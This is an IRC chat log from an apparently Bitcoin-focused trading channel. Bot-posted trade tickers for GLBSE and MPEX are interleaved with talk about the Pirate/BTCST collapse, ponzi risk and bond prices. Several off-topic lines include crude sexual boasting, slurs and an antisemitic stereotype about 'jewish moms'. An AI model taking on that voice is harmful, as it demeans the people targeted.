trade: 12.0301, 24 hour volume: 204861, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 00:16:16 damn those tygr-p looks good at 50% discount. Chaaang-Noi are you buying them right now? Aug 18 00:16:27 [GLBSE] [TYGRR.BOND-P] 10 @ 0.59989 = 5.9989 BTC [+] Aug 18 00:16:28 [GLBSE] [TYGRR.BOND-P] 18 @ 0.5999 = 10.7982 BTC [+] Aug 18 00:16:30 wall at .4 ! Aug 18 00:16:41 :) Aug 18 00:16:44 im greedy!' Aug 18 00:16:55 you greedy bottom feeding bastardo Aug 18 00:17:03 free market Aug 18 00:17:05 I got some for myself too Aug 18 00:18:46 lol Aug 18 00:19:25 smickles they're lucky they have no volume i guess. Aug 18 00:28:07 [MPEX] [F.GIGA.ETF] 3300 @ 0.00095503 = 3.1516 BTC [+] Aug 18 00:29:33 I leave you all to your own devices for 5 minutes and this is what happens... Aug 18 00:32:26 so let's see. bitcointalk is slow, mtgox is slow, glbse is slow. Aug 18 00:32:28 mpex is not slow. Aug 18 00:33:00 Your doing it wrong then, time to open up those free accounts again. Aug 18 00:33:14 yes but are there many visitors flooding mpex? Aug 18 00:33:18 Ill be the first to sign up Aug 18 00:33:45 Ignatius-otc well ya, i think it did half the month's volume today or some shit. Aug 18 00:33:52 awesome Aug 18 00:33:54 Doffx haha why didn't you sign up back when! Aug 18 00:34:03 Ignatius-otc lotsa put action, as you'd expect. Aug 18 00:34:09 I slept...bot grabbed many a ppt bond:-/ Aug 18 00:34:13 I didn’t see it until to late. Aug 18 00:34:18 I went to hawaii that week Aug 18 00:34:31 i think it was free for ~6 weeks Aug 18 00:35:00 Well I should give more detail, I was new to bitcoin at that time. Aug 18 00:35:06 a a Aug 18 00:35:11 So I saw it then was too late. Aug 18 00:35:53 Ignatius-otc do you figure ppt bonds worth anything ? Aug 18 00:35:58 More new to the financial portions my first 3 were all learning how to mine so I didint even pay attention to investments Aug 18 00:36:12 err 3 months* Aug 18 00:36:23 yeah. Aug 18 00:36:35 bitcoin has this great advantage, that it's quite a cheap way to learn financials. Aug 18 00:36:53 I believe the bonds to be worth 1btc still, but I am no expert and it's really up to pirate. Aug 18 00:37:08 It has given me a great bit of new knowledge thats for sure. Aug 18 00:37:11 If they do get redemmed for full deposit my bot did very well:P Aug 18 00:37:42 yeah lol Aug 18 00:37:55 i was curious to hear what odds you give that. Aug 18 00:39:01 odds wise...well Im no expert there are far more knowledgable people in this room alone...but imo I feel 100% confident I will be able to redeem for 1 btc per bond, as stated in contracts/as long as pirate doesnt default etc. I am not manually buying any more...so maybe the 100% quote is optimism... Aug 18 00:39:31 im really curious. Aug 18 00:40:00 as i said before, if the guy actually soft lands his btsc whatever i'll be quite impressed. Aug 18 00:40:23 Hes in otc right now talking about it Aug 18 00:40:30 If you didint already know Aug 18 00:40:35 I didn't, ty! Aug 18 00:40:36 anything interesting to say ? Aug 18 00:40:43 im not in otc, no. Aug 18 00:41:12 Everyone will be paid back starting with the oldest accounts Aug 18 00:41:21 with the 7% interest Aug 18 00:41:49 thats the important part Aug 18 00:41:50 yup...if that poor guy manages to unwind all this I feel pretty abd about all the ponzi attacks he withstood Aug 18 00:41:59 the rest has just been a really cool conversation Aug 18 00:42:03 not that I contributed to that mess...but still Aug 18 00:42:38 I made 120+ coins off it, if I get it back ill be pretty happy. Aug 18 00:42:54 Small time to some I suppose, but its some sweet coin to me. Aug 18 00:43:58 I was reading a thread one day with numerous pirate ponzi attacks. One fairly respected poster said anyone can see what pirate does by simply reading his posts. Within an hour of skimming pirates posts I felt I knew what he was doing, and it wasnt a ponzi. But again...just my opinion. It gave the impression those who called ponzi never even read the mans posts or checked his history. Aug 18 00:44:54 [MPEX] [S.MPOE] 2126 @ 0.00038517 = 0.8189 BTC [+] Aug 18 00:44:55 [MPEX] [S.MPOE] 19474 @ 0.00038622 = 7.5212 BTC [+] Aug 18 00:44:58 7% a week is a ponzi on general principle. Aug 18 00:45:16 lol no Aug 18 00:45:20 It would generally be safe to assume that yes, 7% is far too high of a return weekly. Aug 18 00:45:37 [GLBSE] [PPT.DIV] 2 @ 0.2 = 0.4 BTC [-] Aug 18 00:46:12 There are always outliers. What if you mircea_popescu had an arbitrage opportunity that netted you over 20%, but you needed lots of coins to make it work? Aug 18 00:46:30 i'd buy the coins. Aug 18 00:46:38 i'm not sharing 20%. Aug 18 00:47:14 ahh, so when you go buy these massive amounts of coins and that act itself moves the amrket things get even more tricky Aug 18 00:47:46 the market trades 2mn coins a month. Aug 18 00:47:48 how many do i need ?\ Aug 18 00:48:51 unsure but it was already stated you need enough to drastically impact the market if you were to just use an mtgox for the tx Aug 18 00:48:57 ... Aug 18 00:49:01 again. mtgox does 2mn a month. Aug 18 00:49:10 so what is yoour thoughts mircea_popescu, do you think the bonds and deposits will be returned Aug 18 00:49:24 i was one of the premiere proponents of the pirate = scammer theory. Aug 18 00:49:43 ":46:53 pirateat40 | Although delayed, no one needs to worry about getting coins back. " - and the PPT stuff started to move up ... Aug 18 00:49:50 I ahd heard others say that, but I have yet tos ee you really bash any of it. Aug 18 00:50:24 well im not a pundit, to bash things. but anyway. Aug 18 00:50:58 i still think it'll go badly, as in, no repayments. however, i'm very happy to see that there's a definite solution to the problem now, so im kinda curious. Aug 18 00:51:04 he made a bet against it, made me lots of btc! :) Aug 18 00:51:12 certainly if the man does that which i don't deem possible to be done i'll be well impressed. Aug 18 00:51:15 it's a rare occurence. Aug 18 00:51:44 ahh, so you think the funds are not even there to cover the outstanding debts. interesting. hell of a day regardless gang! Aug 18 00:52:19 [MPEX] [F.GIGA.ETF] 2752 @ 0.00095503 = 2.6282 BTC [+] Aug 18 00:52:20 he may have some older deponents that are really partners from the beginning who will claim they were paid. Aug 18 00:52:21 what happens on gox as 500k bitcoin is released into the marketplace again.. Aug 18 00:52:32 BOOM? Aug 18 00:52:41 ^BOOM Aug 18 00:53:04 Some will go to Glbse, abd Mpex Aug 18 00:53:21 [MPEX] [O.HASH.P10TH] 150000 @ 0.02741639 = 4112.4585 BTC [-] Aug 18 00:53:29 If he pays out like he says he will mircea_popescu should make some more btc Aug 18 00:53:30 4k Aug 18 00:53:38 [GLBSE] [TYGRR.BOND-P] 2 @ 0.7 = 1.4 BTC [+] Aug 18 00:54:06 Doffx i don't stand to directly lose or gain from the guy. Aug 18 00:54:10 A bunch will be sold though. And I'm guessing, as it's gradually sold over the week, pirate can pick them up cheap, and repay his debt at big profit. Aug 18 00:54:10 mircea_popescu i'll make sure to let you know if i fail to be repaid Aug 18 00:54:21 it'll be an honest account i can guarantee you that Aug 18 00:54:23 jcpham how much are you oewd ? Aug 18 00:54:34 numbers aren't important Aug 18 00:54:40 MoneyIsDebt: thats brilliant... Aug 18 00:54:43 degree of magnitude. Aug 18 00:54:53 more than a car, less than house Aug 18 00:55:00 how about that Aug 18 00:55:02 MoneyIsDebt yes, if he has the usd, sure. course it'd have been way cheaper at 9. Aug 18 00:55:06 jcpham works! Aug 18 00:55:14 [GLBSE] [TYGRR.BOND-P] 10 @ 0.6 = 6 BTC [-] Aug 18 00:55:18 jcpham looking forward to it. Aug 18 00:55:22 k Aug 18 00:55:41 it matters in the sense that if you're too big or too small it's debatable. but you seem to be just right. Aug 18 00:55:49 i think so Aug 18 00:55:54 multiply me Aug 18 00:56:36 Has anyone here ahd experience with listing an asset for IPO at glbse far in advance, then that asset not appearing on the designated IPO launch date, and no communications from glbse? Aug 18 00:56:43 MoneyIsDebt well... actually... something a lot like what happened earlier today lol Aug 18 00:57:32 Who really knows? He could have been a millionaire in USD already before this started Aug 18 00:57:41 So he's got both huge USD and BTC amounts Aug 18 00:57:59 [GLBSE] [OBSI.HRPT] 8 @ 0.0511 = 0.4088 BTC [+] Aug 18 00:58:19 possibly. Aug 18 00:58:37 working for someone else more like it, but anyway. Aug 18 00:58:48 [GLBSE] [TYGRR.BOND-P] 10 @ 0.55 = 5.5 BTC [-] Aug 18 00:59:02 yeah, well, that doesn't matter really Aug 18 00:59:08 I'm sure he's rich by now though Aug 18 00:59:55 prolly. Aug 18 01:00:10 you know, actually, thinking about it... that's a funny thing. Aug 18 01:00:17 everyone thinks about zhou, oh, he's rich. Aug 18 01:00:25 in the recent leaks we see he wasn't getting his salary even Aug 18 01:00:32 and making in general a loss. Aug 18 01:00:37 everyone thinks mtgox is making money Aug 18 01:00:43 except their last report they were in the red. Aug 18 01:00:58 and in general... the consensus seems to be "it's visible so it's rich" and the reality more like the reverse. Aug 18 01:01:10 [GLBSE] [BDT] 11 @ 0.98 = 10.78 BTC [-] Aug 18 01:01:22 [GLBSE] [BDT] 15 @ 0.91 = 13.65 BTC [-] Aug 18 01:01:23 [GLBSE] [BDT] 27 @ 0.9 = 24.3 BTC [-] Aug 18 01:01:44 ;;ticker Aug 18 01:01:45 Best bid: 12.9799, Best ask: 12.97991, Bid-ask spread: 0.00001, Last trade: 12.9799, 24 hour volume: 208118, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 01:02:06 ;;asks 10 Aug 18 01:02:08 There are currently 0 bitcoins offered at or under 10.0 USD, worth 0.0 USD in total. Aug 18 01:02:13 ;;bids 10 Aug 18 01:02:13 Where I live it will take me over 1m usd to live as a middle class citizen for the remainder of my life, because of that I have a potentially unique definition of "rich". I don;t think pirate got rich from this, but I guess its possible. Aug 18 01:02:14 There are currently 40952.551 bitcoins demanded at or over 10.0 USD, worth 452818.692392 USD in total. Aug 18 01:02:45 there can only be 20 bitcoin millionaires Aug 18 01:02:46 1mn ? that's kinda cheap. Aug 18 01:02:58 MoneyIsDebt ya srsly. talk about an exclusive club. Aug 18 01:03:09 not to mention even 10 being simultaneously realised seems unlikely. Aug 18 01:03:26 and growing more and more unlikely Aug 18 01:03:31 indeed. Aug 18 01:03:42 for the first time in history we'll see thousandaire being a big fucken deal. Aug 18 01:04:01 :) Aug 18 01:04:27 buncha gold digger jewish moms going in high pitch "o alfred ?! alfred's a multithousandaire!!!" Aug 18 01:05:45 hmm. is it not strange that the 17th of july was 200k and today the 17th of august almost the same ? Aug 18 01:07:53 I'm surprised we're still at double digits Aug 18 01:08:52 ya it recovered nicely. we didn't get nearl;y as battered as it looked it'll be Aug 18 01:09:42 Well this is just the first part with people that had their btc Aug 18 01:09:51 We still need to see what happens next week Aug 18 01:10:24 valid point. did anyone have some low mtgox buy roders get filled during the dip? Aug 18 01:10:30 I recently cancelled one:-/ Aug 18 01:11:02 ;;ticker Aug 18 01:11:03 Best bid: 12.6001, Best ask: 12.60011, Bid-ask spread: 0.00001, Last trade: 12.6001, 24 hour volume: 209264, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 01:11:05 I would have had a bunch Aug 18 01:11:18 [GLBSE] [TYGRR.BOND-P] 15 @ 0.69 = 10.35 BTC [+] Aug 18 01:12:05 I'm certainly buying next week, once ex pirate lenders get their coins and start selling Aug 18 01:12:26 i doubt so many will sell. Aug 18 01:12:45 500k released on the market? Of course it'll have some effect Aug 18 01:12:56 some yes Aug 18 01:13:03 if 20% gets sold you'll see 5 cents price dip Aug 18 01:13:05 but keep in mind 7% weekly will no longer hit the markets Aug 18 01:13:33 [GLBSE] [BBBB] 1000 @ 0.00026 = 0.26 BTC [-] Aug 18 01:13:39 but also nobody will buy bitcoin in order to invest in btcst Aug 18 01:13:40 on the contrary chaang, I expect many a pirate clone to spin up many a ponzi offering astronomical rates:) Aug 18 01:13:44 so less upward pressure Aug 18 01:13:55 on the contrary chaang, I expect many a pirate clone to spin up many a ponzi offering astronomical rates:) <<< THIS Aug 18 01:14:01 even in the case he actually does pay Aug 18 01:14:10 it does not mean it can be done again. i hope people grasp this. Aug 18 01:14:39 [GLBSE] [TYGRR.BOND-P] 5 @ 0.69 = 3.45 BTC [+] Aug 18 01:14:59 [GLBSE] [TYGRR.BOND-P] 36 @ 0.69 = 24.84 BTC [+] Aug 18 01:17:19 [GLBSE] [BIB.PIRATE] 5 @ 0.7 = 3.5 BTC [+] Aug 18 01:17:45 [GLBSE] [YABMC] 5 @ 0.116 = 0.58 BTC [+] Aug 18 01:17:47 [GLBSE] [YABMC] 23 @ 0.11619 = 2.6724 BTC [+] Aug 18 01:17:47 [GLBSE] [YABMC] 10 @ 0.1163 = 1.163 BTC [+] Aug 18 01:17:48 [GLBSE] [YABMC] 5 @ 0.1165 = 0.5825 BTC [+] Aug 18 01:18:51 Hi brendio I saw ya enter. Do you have any idea where your pirate funds sit on the reimbursement list? I assume pirate will do withdrawals oldest accounts first... Aug 18 01:19:53 [GLBSE] [FUTUREFUND] 10000 @ 0.00011716 = 1.1716 BTC [+] Aug 18 01:19:56 [GLBSE] [YABMC] 47 @ 0.118 = 5.546 BTC [+] Aug 18 01:20:30 I have no idea. I just got back from Friday night drinks with old work colleagues and am reading the back log, but will need to head to bed soon and will be out for most of tomorrow. I will update in due time as soon as I know more. Aug 18 01:20:46 ok thanks Aug 18 01:28:36 [GLBSE] [PPT.E] 100 @ 1.25 = 125 BTC [+] Aug 18 01:29:35 ya know Aug 18 01:29:40 if pirate does pay Aug 18 01:29:49 it will create a lot of suckers Aug 18 01:30:12 [GLBSE] [PPT.DIV] 1 @ 0.002 BTC [-] Aug 18 01:30:17 [GLBSE] [TYGRR.BOND-P] 3 @ 0.6 = 1.8 BTC [-] Aug 18 01:30:23 'well, pirate wasn't a ponzi, so this other guy offering >5% per week probably isn't either" Aug 18 01:31:24 /join #btcst Aug 18 01:31:58 but smickles anyone throwing money at something with so little due dilligence is swimming at their own risk? Aug 18 01:32:20 [GLBSE] [TYGRR.BOND-P] 2 @ 0.6 = 1.2 BTC [-] Aug 18 01:35:05 [GLBSE] [PPT.B] 110 @ 1.1 = 121 BTC [-] Aug 18 01:35:22 P is still at .6 hmm Aug 18 01:35:52 [GLBSE] [TYGRR.BOND-P] 7 @ 0.56 = 3.92 BTC [-] Aug 18 01:36:12 [GLBSE] [YARR] 50 @ 1 = 50 BTC [+] Aug 18 01:36:13 [GLBSE] [YARR] 7 @ 1 = 7 BTC [+] Aug 18 01:36:14 [GLBSE] [YARR] 4 @ 1 = 4 BTC [+] Aug 18 01:36:15 Chaaang-Noi: Just because glbse is slow Aug 18 01:36:15 [GLBSE] [YARR] 49 @ 1 = 49 BTC [+] Aug 18 01:36:16 [GLBSE] [YARR] 21 @ 1 = 21 BTC [+] Aug 18 01:37:20 .56 now hmm Aug 18 01:37:49 [GLBSE] [GIGAMINING] 20 @ 1.024 = 20.48 BTC [+] Aug 18 01:37:57 smickles yup, was just saying that. Aug 18 01:37:59 I bought some at 0.5 Aug 18 01:38:06 no more cash Aug 18 01:38:11 just because pissing on the electric wire worked once doesn't mean it's safe now Aug 18 01:38:44 why is anyone buying yarr at 1 though Aug 18 01:38:49 that doesn't make sense Aug 18 01:38:54 yarr is insured for 1 btc Aug 18 01:39:15 read its thread, discusses just this, laying out where yarrs funds actually are Aug 18 01:39:32 in it usagi is claiming even post pirate changes each is worth 1 btc Aug 18 01:39:41 .. so you buy it at 1 and can at most sell it at 1 Aug 18 01:39:44 yup Aug 18 01:39:46 so you only pay fees Aug 18 01:39:51 i'm the one that just bought 131 at 1 Aug 18 01:39:56 ah Aug 18 01:39:57 and will buy another 50 shares in a sec Aug 18 01:39:58 [GLBSE] [FPGAMINING] 1 @ 0.822 BTC [-] Aug 18 01:39:59 [GLBSE] [FPGAMINING] 7 @ 0.821 = 5.747 BTC [-] Aug 18 01:40:00 [GLBSE] [FPGAMINING] 6 @ 0.82 = 4.92 BTC [-] Aug 18 01:40:01 that makes sense Aug 18 01:40:03 YARR is worth 1. Aug 18 01:40:21 Yeah, it wouldn't make sense for anyone but you to buy it Aug 18 01:40:23 at 1 Aug 18 01:40:38 [GLBSE] [FOO.PPPPT] 10 @ 0.5 = 5 BTC [+] Aug 18 01:40:40 chang Aug 18 01:40:44 so what's your plan now that pirate is gone? Aug 18 01:40:47 [GLBSE] [PPT.E] 50 @ 1.24 = 62 BTC [-] Aug 18 01:41:21 i know Aug 18 01:41:35 it's watching 'saturdaynight fever' 18 time in a row Aug 18 01:42:11 ahahaha Aug 18 01:42:18 rg: to become the new pirate Aug 18 01:42:20 why not grease ? Aug 18 01:42:36 grease is a better movie Aug 18 01:42:40 [GLBSE] [TYGRR.BOND-P] 1 @ 0.6 BTC [+] Aug 18 01:42:50 of course... he could just watch snatch Aug 18 01:43:28 say. did bitlane request a withdrawal from pirate which got no response Aug 18 01:43:36 other than the closure of the entire thing ? Aug 18 01:43:54 rg im going boating this weekend, bringing two girls Aug 18 01:44:01 im pretty sure lots of sex and beer... Aug 18 01:44:09 im sure your wife will enjoy that Aug 18 01:44:30 1, she is not here. 2, she understands im a man. i love thai culture. Aug 18 01:44:31 he's married ? Aug 18 01:44:35 yeah Aug 18 01:44:55 ahaha. .tr "i love thai culture." "I fuck ladybois" Aug 18 01:45:02 because she lets you is a terrible reason to betray your wife Aug 18 01:45:22 betray? she knew the deal going into this... Aug 18 01:45:31 she knew who i was, lol. Aug 18 01:45:38 two wrongs dont make a right Aug 18 01:45:54 i never knew rg is such a family man. Aug 18 01:45:56 its better than one wrong though Aug 18 01:46:04 im no family mna Aug 18 01:46:06 hahah usagi Aug 18 01:46:13 i just dont believe in cheating in any way shape or form Aug 18 01:46:14 wrongs should come in pairs Aug 18 01:46:26 that's all Aug 18 01:46:26 rg : i haven't had sex with a single woman yet this year. Aug 18 01:46:35 please don;t go on an EskimoBob rant nao Aug 18 01:46:46 that guy is a dick Aug 18 01:47:11 he likes turds Aug 18 01:47:20 i dont understand, are you guys saying sex is a sin or something? cuz that is not the way it works in thailand, i love budhists... Aug 18 01:47:37 hell, im within my right to have one or two minor wives Aug 18 01:47:39 i think i was pretty clear Aug 18 01:48:01 I'm jealous Aug 18 01:48:04 I'm planning a trip to Thailand next month. Lovely place Aug 18 01:48:06 rg is luke jr? Aug 18 01:48:19 it can me MoneyIsDebt :) Aug 18 01:48:19 lol Aug 18 01:48:42 let me know when and where, if its just over the boarder i wont be able to meet you. Aug 18 01:48:51 buddhism has prohibitions against immoral sexual activity though. Aug 18 01:48:54 [GLBSE] [YARR] 14 @ 1 = 14 BTC [+] Aug 18 01:48:55 [GLBSE] [YARR] 15 @ 1 = 15 BTC [+] Aug 18 01:49:00 I'll let you know once the plans are more concrete Aug 18 01:49:07 You back yet, or in the US? Aug 18 01:49:08 immoral is relative Aug 18 01:49:16 is it ok to do it in the butt by budhism views ? Aug 18 01:49:19 actually in this case it is well defined Aug 18 01:50:07 usagi> buddhism has prohibitions against immoral sexual activity though. yes, that is what im doing bad, and its aginst myself, not my wife. i love thailand :) she feels sorry for how weak i am, not that i hurt her by cheating, lol Aug 18 01:50:17 still usa Aug 18 01:50:19 thailand soon Aug 18 01:50:22 cant wait to get back Aug 18 01:50:32 Well you clearly don't understand women goat Aug 18 01:50:49 usagi: You don't understand Thais... Aug 18 01:50:53 i know your a girl and what not but i dont need to understand them to get what i want... Aug 18 01:51:09 last line was for usagi Aug 18 01:51:24 [GLBSE] [TYGRR.BOND-P] 1 @ 0.6 BTC [+] Aug 18 01:51:32 im so tired Aug 18 01:51:33 MoneyIsDebt actually I do, as I am a fully enlightened buddhist master, I understand everything. Aug 18 01:51:37 i need to stay up til at least 10 Aug 18 01:51:48 why do you need to stay up ? Aug 18 01:52:11 [GLBSE] [BDT] 2 @ 0.9 = 1.8 BTC [-] Aug 18 01:52:35 he is a vampire princess Aug 18 01:52:35 Seriously though, Goat, when will you put up a bid wall for your insured bond? how will you ahndle it? Aug 18 01:53:07 kiyuuketsuki ohimesama is my formal title. Aug 18 01:53:23 ill place a wall once i know how much intersti need to pay out. Aug 18 01:53:42 it wont be until monday Aug 18 01:53:50 too much blood in this market :) Aug 18 01:53:52 You're paying interest too? complex :/ Aug 18 01:54:01 if pirate does, i dont see why i would not. Aug 18 01:54:17 its just an insured ppt Aug 18 01:54:24 yarr should still pay daily too Aug 18 01:54:41 I have successfully withdrawn a grand total of 2165 BTC over 4 separate transactions, each of those 4 requests being filled within minutes. Aug 18 01:54:41 (1 of them being a 1900 BTC request) Aug 18 01:54:47 seems bitlane is smaller than you jcpham :p Aug 18 01:55:26 [GLBSE] [PPT.A] 190 @ 1.18 = 224.2 BTC [+] Aug 18 01:55:42 lol Aug 18 01:55:45 buying dead binds Aug 18 01:55:45 bonds Aug 18 01:55:46 WIN Aug 18 01:56:21 fuck Aug 18 01:56:22 im a retard Aug 18 01:56:29 i was going to buy a bunch of S.MPOE yesterday Aug 18 01:56:35 its literally sitting on my bash prompt Aug 18 01:56:38 never entered my pw Aug 18 01:56:40 now today its up a bunch Aug 18 01:56:53 aww Aug 18 01:56:58 idiot fuck face rg Aug 18 01:57:00 buy on glbse, its down there for some reason Aug 18 01:57:08 or it was Aug 18 01:57:13 [GLBSE] [ASICMINER] 2 @ 0.105 = 0.21 BTC [+] Aug 18 01:57:14 no Aug 18 01:57:23 bitvps does awful on glbse Aug 18 01:57:37 i think theres a reason for that Aug 18 01:57:43 people on glbse just want to buy shit that produces no profit Aug 18 01:58:35 lol Aug 18 01:58:41 well they're mostly kids. Aug 18 01:58:54 [GLBSE] [ASICMINER] 1 @ 0.105 BTC [+] Aug 18 01:59:04 [GLBSE] [TYGRR.BOND-P] 16 @ 0.6 = 9.6 BTC [+] Aug 18 01:59:06 [GLBSE] [TYGRR.BOND-P] 1 @ 0.6 BTC [+] Aug 18 01:59:34 [MPEX] [S.MPOE] 27726 @ 0.00038622 = 10.7083 BTC [+] Aug 18 01:59:35 [MPEX] [S.MPOE] 7900 @ 0.00039243 = 3.1002 BTC [+] Aug 18 01:59:36 [MPEX] [S.MPOE] 5964374 @ 0.0003965 = 2364.8743 BTC [+] Aug 18 01:59:37 [GLBSE] [NYAN.B] 10 @ 0.99999999 = 10 BTC [-] Aug 18 01:59:39 [GLBSE] [NYAN.B] 35 @ 1.02 = 35.7 BTC [+] Aug 18 01:59:48 ummm Aug 18 01:59:58 ty ? Aug 18 02:00:01 [GLBSE] [YARR] 4 @ 1 = 4 BTC [+] Aug 18 02:00:22 lol Aug 18 02:00:33 ;;ticker Aug 18 02:00:33 Best bid: 12.72, Best ask: 12.85, Bid-ask spread: 0.13000, Last trade: 12.70001, 24 hour volume: 211815, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 02:00:42 .py 2364.8743 * 12.72 Aug 18 02:00:43 they would amade more profit giving that to bivps. Aug 18 02:00:43 30081.201096 Aug 18 02:00:54 yay. a car. Aug 18 02:01:15 rg are there even that many shares on the mkt ? Aug 18 02:02:55 there could be Aug 18 02:03:04 actually no Aug 18 02:03:17 i actually bought back a ton of shares Aug 18 02:03:24 moar profit for rg Aug 18 02:03:28 hehehe Aug 18 02:03:35 i bought back some of my own too. Aug 18 02:03:42 if people want to sell cheap... why not. Aug 18 02:03:48 yeah Aug 18 02:03:54 people seem to want to get rid of BitVPS Aug 18 02:04:01 with 55.5 BTC div payouts .. Aug 18 02:04:03 sure Aug 18 02:04:05 why not, ill take em back Aug 18 02:04:16 I guess that's the one advantage of litecoin... people can panic much faster Aug 18 02:04:38 i want to rebuy JWU's shares Aug 18 02:04:38 litecoin still around ? Aug 18 02:04:43 but he spent a fuckload on them Aug 18 02:04:50 i dont want to rebuy thm at the price he paid for em Aug 18 02:05:06 what did he pay ? Aug 18 02:05:12 over 0045 Aug 18 02:05:23 glbse price is inflated Aug 18 02:05:26 that's why it doesnt sell/do anything Aug 18 02:05:41 the spread is like 002 btc Aug 18 02:06:50 [MPEX] [S.MPOE] 715 @ 0.00038089 = 0.2723 BTC [-] Aug 18 02:06:51 [MPEX] [S.MPOE] 5387 @ 0.00037661 = 2.0288 BTC [-] Aug 18 02:06:53 [GLBSE] [PPT.E] 50 @ 1.24 = 62 BTC [-] Aug 18 02:06:54 [MPEX] [S.MPOE] 15830 @ 0.00037653 = 5.9605 BTC [-] Aug 18 02:08:13 ah Aug 18 02:08:34 or people just dont awnt it cause the div payouts to glbse are shitty Aug 18 02:08:35 http://www.flickr.com/photos/76351562@N04/7796357438 Aug 18 02:08:38 im just going to start paying out a ton Aug 18 02:08:45 i already started last payout Aug 18 02:08:46 i liked it Aug 18 02:08:49 who's running the etf ? or what is it ? Aug 18 02:09:21 [GLBSE] [PPT.A] 5 @ 1.18 = 5.9 BTC [+] Aug 18 02:09:46 so where are the pirate passthrough investors going to move their money now? and where can I buy some? Aug 18 02:11:19 [MPEX] [B.MPCD.A] 600 @ 0.001005 = 0.603 BTC [-] Aug 18 02:11:24 ^ Aug 18 02:11:29 that was your answer Aug 18 02:11:46 [MPEX] [B.MPCD.B] 1500 @ 0.001008 = 1.512 BTC [+] Aug 18 02:11:55 [MPEX] [B.MPCD.C] 3200 @ 0.0010223 = 3.2714 BTC [+] Aug 18 02:12:12 buy nyan.a, b or c Aug 18 02:12:12 MoneyIsDebt: well, actually s2cm is looking to expand Aug 18 02:12:16 Pirate is dead :> Aug 18 02:12:34 Oh, I'd like to pick up 500 shares of that, but it's way overpriced right now Aug 18 02:12:49 didn't azelphur buy it all at 1 and then try to sell it at 2? Aug 18 02:12:51 nyan.c ? After pirate closed? Aug 18 02:12:53 usagi: we're prolly going to expand by issuing a proper bond Aug 18 02:13:07 That could work Aug 18 02:13:23 Azelphur did buy at 1 and sold > 2 iirc, then bought back in at 2 Aug 18 02:13:49 ^ that Aug 18 02:14:01 bought at 1, sold at ~2.5, bought at 2, trying to sell at 2.8 Aug 18 02:14:23 Azelphur: waht do you think of an s2cm bond that pays a monthly coupon? Aug 18 02:14:41 even if you didn't buy it, it would increase your dividends Aug 18 02:15:19 im surprsied people arent buying that .C mircea Aug 18 02:15:38 sorry, but what is s2cm? Any links? Aug 18 02:16:10 oh,its a good one MoneyIsDebt. where did I put that link... Aug 18 02:16:12 it'll prolly be something like 1btc face value, matures in 3 months, pays .015 btc per month Aug 18 02:16:25 smickles: I'm confused, isn't that what SS already does? Aug 18 02:16:29 https://bitcointalk.org/index.php?topic=74216.0 Aug 18 02:16:46 oh cool, but it'd be something we could invest how ever much we wanted into? Aug 18 02:16:54 Azelphur: nope, the shares get paid a dividend Aug 18 02:17:02 the dividend amount can change Aug 18 02:17:18 and there is no buyback time set Aug 18 02:17:24 (maturity) Aug 18 02:17:35 I'm confused then, this sounds like exactly what SS already is Aug 18 02:17:40 [GLBSE] [PPT.E] 400 @ 1.24 = 496 BTC [-] Aug 18 02:17:51 this would be, you pay 1btc to get a bond, it pays 0.015 each month for 3 months, then pays 1 btc Aug 18 02:18:25 I see Aug 18 02:18:31 actually, you would pay the market rate Aug 18 02:18:32 sorta like a passthrough, only all the banks Aug 18 02:18:36 Its like ppt, only at 1.5% and matures in 3 months instead of 1 and you get a div each month Aug 18 02:18:45 but saying 1 btc maid it easier to explain Aug 18 02:19:23 Doffx: sorta, ppt are zero coupon bonds Aug 18 02:19:24 I'm half asleep and have no idea Aug 18 02:19:25 lol Aug 18 02:19:29 this would have a coupon Aug 18 02:19:40 yeah Aug 18 02:20:04 Id like to see something that you can get your btc in and out quickly Aug 18 02:20:23 Glbse just has no liquidity most of the time Aug 18 02:20:24 you should be able to buy and sell it as you wish Aug 18 02:20:33 thats true tho Aug 18 02:21:05 As long as you could sell at the 1btc and not lose it would be a decent bond Aug 18 02:21:17 i dunno where it would list, if at all, tho Aug 18 02:21:38 mircea has expressed interest in baking it into the next mpcd Aug 18 02:21:54 [GLBSE] [PPT.A] 185 @ 1.18 = 218.3 BTC [+] Aug 18 02:21:56 I need an account and im too cheap to buy one Aug 18 02:21:59 There's less liquidity because you "reserve" your bitcoins when you place a bid Aug 18 02:22:14 Remove that limitation, and it's possible to set up buy back bid walls on everything Aug 18 02:22:28 Doffx: i'm working on a brokerage service for mpex Aug 18 02:22:41 What will the fee be? Aug 18 02:22:56 [MPEX] [S.MPOE] 33218 @ 0.00037181 = 12.3508 BTC [-] Aug 18 02:23:02 Same as transacting on glbse Id assume or close? Aug 18 02:23:04 Doffx: something like a 0.5% comission on action Aug 18 02:23:12 that would be very welcomed! Aug 18 02:23:14 simple and cheap Aug 18 02:23:30 *and secure Aug 18 02:23:42 Will the site offer information on everything listed? Aug 18 02:23:48 yes Aug 18 02:23:56 Id like that Aug 18 02:24:04 a little summary and such Aug 18 02:24:06 I get tired of trying to follow the securities forum Aug 18 02:24:09 everything in plain english Aug 18 02:24:25 any ETA to launch? Aug 18 02:24:26 i'll eventually put a news feed in Aug 18 02:24:43 Id use it. Aug 18 02:25:07 Ignatius-otc: unfortunately, i cant give a good answer, but i can say as soon as i code a minimum viable product Aug 18 02:25:29 ahh early stages. well yes let us know. I will come beta test:) Aug 18 02:25:40 Needs to be done bu Sunday night smickles Aug 18 02:25:51 I predict lots of action starting monday Aug 18 02:25:53 :) Aug 18 02:25:57 i'll launch after you can safely buy, sell, see your portfolio; but before i get into the css of the webpage Aug 18 02:26:32 [GLBSE] [YARR] 2 @ 1 = 2 BTC [+] Aug 18 02:26:58 Doffx: if my daughter lets me, I can see that as a possibility Aug 18 02:27:41 rg well some are. Aug 18 02:27:46 it did sell ~350 btc worth Aug 18 02:27:55 i meant a crazy amount Aug 18 02:28:12 haha let me know then smickles Aug 18 02:28:24 ill have pleanty to move in to it come monday Aug 18 02:29:22 doffx : mpex has teh liquidity. Aug 18 02:29:38 I know ive seen, now that I understand this a lot better. Aug 18 02:29:55 rg well it cant bee too crazy seeing how the entire cdo line is 1.1k. i figured, start small. Aug 18 02:30:26 but based on demand i'ma make a larger one when this dies on november 1st Aug 18 02:30:38 prolly plenty of demand for solid bonds by then anyway. Aug 18 02:31:27 how about demand for mpex to pay interest again Aug 18 02:31:28 i'll launch after you can safely buy, sell, see your portfolio; but before i get into the css of the webpage <<< spoken like a true mpex alumni hahaha Aug 18 02:31:33 [MPEX] 